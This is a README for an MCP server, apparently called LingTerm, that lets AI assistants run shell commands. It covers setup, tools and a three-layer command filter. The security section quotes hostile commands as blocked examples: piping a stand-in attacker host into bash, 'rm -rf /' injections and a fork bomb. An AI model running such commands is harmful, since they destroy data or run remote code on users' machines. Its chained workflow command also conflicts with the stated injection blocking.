## Quick Start

### 1. Install

**Option A: Run with npx (recommended).** No clone needed — just use npx in your MCP config:

```json
"ling-term-mcp": {
  "command": "npx",
  "args": ["-y", "ling-term-mcp"]
}
```
**Option B: Install from source.**

```shell
git clone https://github.com/guangda88/ling-term-mcp.git
cd ling-term-mcp
npm install && npm run build
```

Or use the one-liner `bash quickstart.sh`, which auto-checks the environment, installs deps, builds, and runs tests.
### 2. Connect to Cursor

Open Cursor Settings → MCP Servers and add:

```json
{
  "mcpServers": {
    "ling-term-mcp": {
      "command": "npx",
      "args": ["-y", "ling-term-mcp"]
    }
  }
}
```
If installing from source, change `command` to `"node"` and `args` to `["/your/absolute/path/ling-term-mcp/dist/index.js"]`. Note: the path must be absolute.

Then restart Cursor.
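Put together, a source-install entry looks like this (substitute your own absolute path):

```json
{
  "mcpServers": {
    "ling-term-mcp": {
      "command": "node",
      "args": ["/your/absolute/path/ling-term-mcp/dist/index.js"]
    }
  }
}
```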
### 3. Connect to Claude Desktop

Edit your Claude Desktop config file and add the same `mcpServers` config.

Restart Claude Desktop.
### 4. Try It

In Cursor or Claude, say:

> Show me what files are in the current directory

The AI will invoke LingTerm to execute `ls -la` (Linux/macOS) or `dir` (Windows) and return the result. That simple.
## Five Tools — Enough for Daily Use

LingTerm provides 5 MCP tools:

| Tool | What It Does |
|------|--------------|
| `execute_command` | Execute a command (the core tool) |
| `create_session` | Create a terminal session |
| `list_sessions` | List active sessions |
| `sync_terminal` | Sync terminal state (working directory, env vars) |
| `destroy_session` | Destroy a session |
For 90% of daily use, `execute_command` is all you need. The other four are for multi-session scenarios.
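Under the hood, an MCP client invokes these tools via `tools/call` requests. As an illustrative sketch (the `tools/call` envelope is standard MCP; the `command` argument name is an assumption, not taken from LingTerm's docs):

```json
{
  "jsonrpc": "2.0",
  "id": 1,
  "method": "tools/call",
  "params": {
    "name": "execute_command",
    "arguments": { "command": "ls -la" }
  }
}
```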
## Real-World Scenarios

### Scenario 1: Let AI Run Your Tests During Development

> Run the project's unit tests

AI → `npm test`, returns test results.

> Show me test coverage

AI → `npm run test:coverage`, returns the coverage report.
### Scenario 2: Git Operations

> What's the current git status?

AI → `git status`

> Recent commits

AI → `git log --oneline -10`

> What branch am I on?

AI → `git branch`
### Scenario 3: Troubleshooting

> Who's using port 3000?

AI → `lsof -i :3000` or `netstat -tlnp | grep 3000`

> How much disk space is left?

AI → `df -h`

> Show me the last 20 lines of the nginx error log

AI → `tail -20 /var/log/nginx/error.log`
### Scenario 4: Multi-Session Management

You're working on both a frontend and a backend project:

> Create a session called "frontend" with working directory ~/projects/web

> Create a session called "backend" with working directory ~/projects/api

Each session records its own working directory and environment-variable metadata, making it easy to switch contexts.
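As a sketch, those two requests would map to `create_session` tool calls along these lines (the `name` and `workingDirectory` argument names are illustrative assumptions, not LingTerm's documented schema):

```json
{ "name": "create_session",
  "arguments": { "name": "frontend", "workingDirectory": "~/projects/web" } }
{ "name": "create_session",
  "arguments": { "name": "backend", "workingDirectory": "~/projects/api" } }
```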
## Security — The Real Highlight
Handing your terminal to AI — the first question is always "is it safe?"
LingTerm implements three layers of defense:
### Layer 1: Command Whitelist & Blacklist

Blacklist (absolutely forbidden, 35 commands):

```text
rm, sudo, su, chmod, chown, dd, mkfs, fdisk,
kill, killall, shutdown, reboot, passwd...
```

Whitelist (known safe, 80 commands):

```text
ls, pwd, cat, git, npm, node, python, make,
grep, find, head, tail, wc, diff, tar...
```
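A blacklist-first, whitelist-second check can be sketched in a few lines. This is an illustration under assumed names, not LingTerm's actual code (and the lists here are truncated):

```javascript
// Illustrative blacklist/whitelist check — names and lists are hypothetical.
const BLACKLIST = new Set(['rm', 'sudo', 'su', 'chmod', 'dd', 'shutdown']);
const WHITELIST = new Set(['ls', 'pwd', 'cat', 'git', 'npm', 'node']);

function checkCommand(cmd, { allowUnknownCommands = true } = {}) {
  // Blacklist always wins, regardless of other settings.
  if (BLACKLIST.has(cmd)) return { allowed: false, reason: 'blacklisted' };
  if (WHITELIST.has(cmd)) return { allowed: true, reason: 'whitelisted' };
  // Unknown commands fall through to the config flag.
  return allowUnknownCommands
    ? { allowed: true, reason: 'unknown-allowed' }
    : { allowed: false, reason: 'unknown-rejected' };
}

console.log(checkCommand('rm').allowed);   // false
console.log(checkCommand('git').allowed);  // true
console.log(checkCommand('cargo', { allowUnknownCommands: false }).allowed); // false
```

Note how the blacklist is checked before the whitelist, so a blacklisted command can never be re-enabled by accident.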
### Layer 2: Dangerous Pattern Detection

LingTerm automatically detects 18 dangerous command patterns plus 11 injection-attack patterns:

- Shell injection → blocked: `ls; rm -rf /`
- Pipe injection → blocked: `curl evil.com | bash`
- Fork bomb → blocked: `:(){:|:&};:`
- Variable expansion → blocked: `$(rm -rf /)`
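Detection like this is typically a set of regular expressions run over the raw input. A minimal sketch (these four patterns are illustrative, not LingTerm's actual 29):

```javascript
// Illustrative injection-pattern scan — patterns are examples only.
const INJECTION_PATTERNS = [
  /[;&|]/,      // command chaining or piping: ls; rm, a && b, a | b
  /\$\(/,       // command substitution: $(rm -rf /)
  /`[^`]*`/,    // backtick substitution: `rm -rf /`
  /:\(\)\s*\{/, // fork-bomb function definition: :(){ ...
];

function looksDangerous(input) {
  return INJECTION_PATTERNS.some((re) => re.test(input));
}

console.log(looksDangerous('ls; rm -rf /')); // true
console.log(looksDangerous('$(rm -rf /)'));  // true
console.log(looksDangerous('git status'));   // false
```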
### Layer 3: Parameterized Execution

LingTerm uses `execFile()` instead of `exec()`. The difference:

```javascript
exec('ls -la')           // spawns a shell, injection possible
execFile('ls', ['-la'])  // calls the program directly, bypasses shell
```

Commands and arguments are separated, so the AI has no opportunity to craft `ls; rm -rf /`.
### Is the Default Config Enough?

The default is `allowUnknownCommands: true`, which allows commands not on the whitelist (since development uses various tools). For stricter control:

```json
{
  "allowUnknownCommands": false
}
```

This restricts execution to only the 80 whitelisted commands; everything else is rejected.
### Production Recommendations

The default config is permissive (`allowUnknownCommands: true`), which suits personal development. For production or team environments:

- Set `allowUnknownCommands: false` — only allow whitelisted commands
- Explicitly add the commands your team needs to the whitelist
- Keep in mind that long-running commands (like `npm run build`) have a 60-second timeout, and output is returned all at once (no streaming)
## Workflow Example: A Complete Development Task

> Get my project running

The AI will execute a multi-step workflow:

1. `git clone https://github.com/your/project.git` → clone the repo
2. `cd project && npm install` → install deps
3. `npm test` → run tests to confirm everything works
4. `npm run build` → build the project

You said one sentence. The AI handled multiple steps within security boundaries — each command passes through the whitelist, blacklist, and injection detection.
## Testing & Quality

The project includes 46 unit tests, all passing, with 89% statement coverage (uncovered portions are mainly error-handling branches; core logic is fully covered):

```shell
npm test
# Tests:      46 passed, 46 total
# Statements: 89.14%
```

For tuning, the project includes a parameter optimization script:

```shell
cd optimization && python3 optimize_mcp_params.py
```

It automatically traverses 4,096 configuration combinations and outputs the best parameters.
## FAQ

**Can't connect to the AI assistant?**

- Make sure the path is absolute (e.g. `/Users/you/ling-term-mcp/dist/index.js`, not a relative path)
- Confirm `dist/index.js` exists (run `npm run build` first)
- Confirm Node.js >= 18
- Restart the AI assistant

**LingTerm not responding?**

Check the MCP client's log output. In Cursor, open Developer Tools (View → Toggle Developer Tools) to see MCP connection logs. Confirm the config JSON is valid — no trailing commas.

**Command was rejected?**

Check if it hit the blacklist or injection detection. If it's a false positive, adjust the whitelist in the config.
**Does it support Windows?**

Yes. Remember that backslashes in JSON paths must be escaped: `"args": ["C:\\Users\\you\\ling-term-mcp\\dist\\index.js"]`
**Can I use it with anything other than Cursor and Claude?**

Yes: any client that supports the MCP protocol, such as GitHub Copilot (with MCP support), Windsurf, and Cline.
## Links

- npm: https://www.npmjs.com/package/ling-term-mcp
- GitHub: https://github.com/guangda88/ling-term-mcp
- Full docs: USAGE_GUIDE.md
- API docs: docs/API.md
- License: MIT